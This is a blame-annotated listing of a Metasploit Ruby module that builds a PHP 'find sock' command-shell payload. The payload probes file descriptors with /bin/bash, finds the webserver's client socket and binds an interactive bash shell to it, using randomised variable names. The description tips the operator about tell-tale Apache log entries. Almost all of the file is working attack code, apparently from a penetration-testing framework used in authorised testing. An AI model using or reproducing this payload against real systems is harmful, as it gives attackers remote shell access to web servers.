2008-09-24 04:41:51 +00:00
|
|
|
##
|
2017-07-24 06:26:21 -07:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 13:50:46 -05:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2008-09-24 04:41:51 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
2016-03-08 14:02:44 +01:00
|
|
|
module MetasploitModule
|
2008-09-24 04:41:51 +00:00
|
|
|
|
2015-03-09 15:44:14 -05:00
|
|
|
CachedSize = :dynamic
|
2015-03-09 15:31:04 -05:00
|
|
|
|
2008-09-24 04:41:51 +00:00
|
|
|
include Msf::Payload::Single
|
|
|
|
|
include Msf::Payload::Php
|
2010-02-24 01:19:59 +00:00
|
|
|
include Msf::Sessions::CommandShellOptions
|
2008-09-24 04:41:51 +00:00
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
|
super(merge_info(info,
|
2010-07-20 20:21:54 +00:00
|
|
|
'Name' => 'PHP Command Shell, Find Sock',
|
2008-09-24 04:41:51 +00:00
|
|
|
'Description' => %Q{
|
|
|
|
|
Spawn a shell on the established connection to
|
2009-02-17 06:04:02 +00:00
|
|
|
the webserver. Unfortunately, this payload
|
2010-07-20 20:21:54 +00:00
|
|
|
can leave conspicuous evil-looking entries in the
|
2009-02-17 06:04:02 +00:00
|
|
|
apache error logs, so it is probably a good idea
|
|
|
|
|
to use a bind or reverse shell unless firewalls
|
|
|
|
|
prevent them from working. The issue this
|
|
|
|
|
payload takes advantage of (CLOEXEC flag not set
|
|
|
|
|
on sockets) appears to have been patched on the
|
|
|
|
|
Ubuntu version of Apache and may not work on
|
|
|
|
|
other Debian-based distributions. Only tested on
|
|
|
|
|
Apache but it might work on other web servers
|
|
|
|
|
that leak file descriptors to child processes.
|
2008-09-24 04:41:51 +00:00
|
|
|
},
|
2014-07-11 12:45:23 -05:00
|
|
|
'Author' => [ 'egypt' ],
|
2008-09-24 04:41:51 +00:00
|
|
|
'License' => BSD_LICENSE,
|
|
|
|
|
'Platform' => 'php',
|
|
|
|
|
'Handler' => Msf::Handler::FindShell,
|
|
|
|
|
'Session' => Msf::Sessions::CommandShell,
|
|
|
|
|
'Arch' => ARCH_PHP
|
|
|
|
|
))
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def php_findsock
|
|
|
|
|
|
2008-09-30 19:56:16 +00:00
|
|
|
var_cmd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
|
|
|
|
|
var_fd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
|
|
|
|
|
var_out = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
|
2008-09-24 04:41:51 +00:00
|
|
|
shell = <<END_OF_PHP_CODE
|
2017-02-02 17:57:03 -06:00
|
|
|
#{php_preamble}
|
2008-09-24 04:41:51 +00:00
|
|
|
print("<html><body>");
|
|
|
|
|
flush();
|
|
|
|
|
|
2008-09-30 19:56:16 +00:00
|
|
|
function mysystem(#{var_cmd}){
|
2017-02-02 17:57:03 -06:00
|
|
|
#{php_system_block(cmd_varname: var_cmd, output_varname: var_out)}
|
2008-09-30 19:56:16 +00:00
|
|
|
return #{var_out};
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
#{var_fd} = 13;
|
2008-09-24 04:41:51 +00:00
|
|
|
for ($i = 3; $i < 50; $i++) {
|
2008-09-30 19:56:16 +00:00
|
|
|
$foo = mysystem("/bin/bash 2>/dev/null <&$i -c 'echo $i'");
|
2008-09-24 04:41:51 +00:00
|
|
|
if ($foo != $i) {
|
2008-09-30 19:56:16 +00:00
|
|
|
#{var_fd} = $i - 1;
|
2008-09-24 04:41:51 +00:00
|
|
|
break;
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
print("</body></html>\n\n");
|
|
|
|
|
flush();
|
|
|
|
|
|
2008-09-30 19:56:16 +00:00
|
|
|
#{var_cmd} = "/bin/bash <&#{var_fd} >&#{var_fd} 2>&#{var_fd}";
|
|
|
|
|
mysystem(#{var_cmd});
|
2008-09-24 04:41:51 +00:00
|
|
|
|
|
|
|
|
END_OF_PHP_CODE
|
|
|
|
|
|
2010-02-24 01:19:59 +00:00
|
|
|
|
2008-09-24 04:41:51 +00:00
|
|
|
return shell
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Constructs the payload
|
|
|
|
|
#
|
2022-11-04 00:33:03 +00:00
|
|
|
def generate(_opts = {})
|
2008-09-24 04:41:51 +00:00
|
|
|
return php_findsock
|
|
|
|
|
end
|
2009-02-17 06:04:02 +00:00
|
|
|
end
|
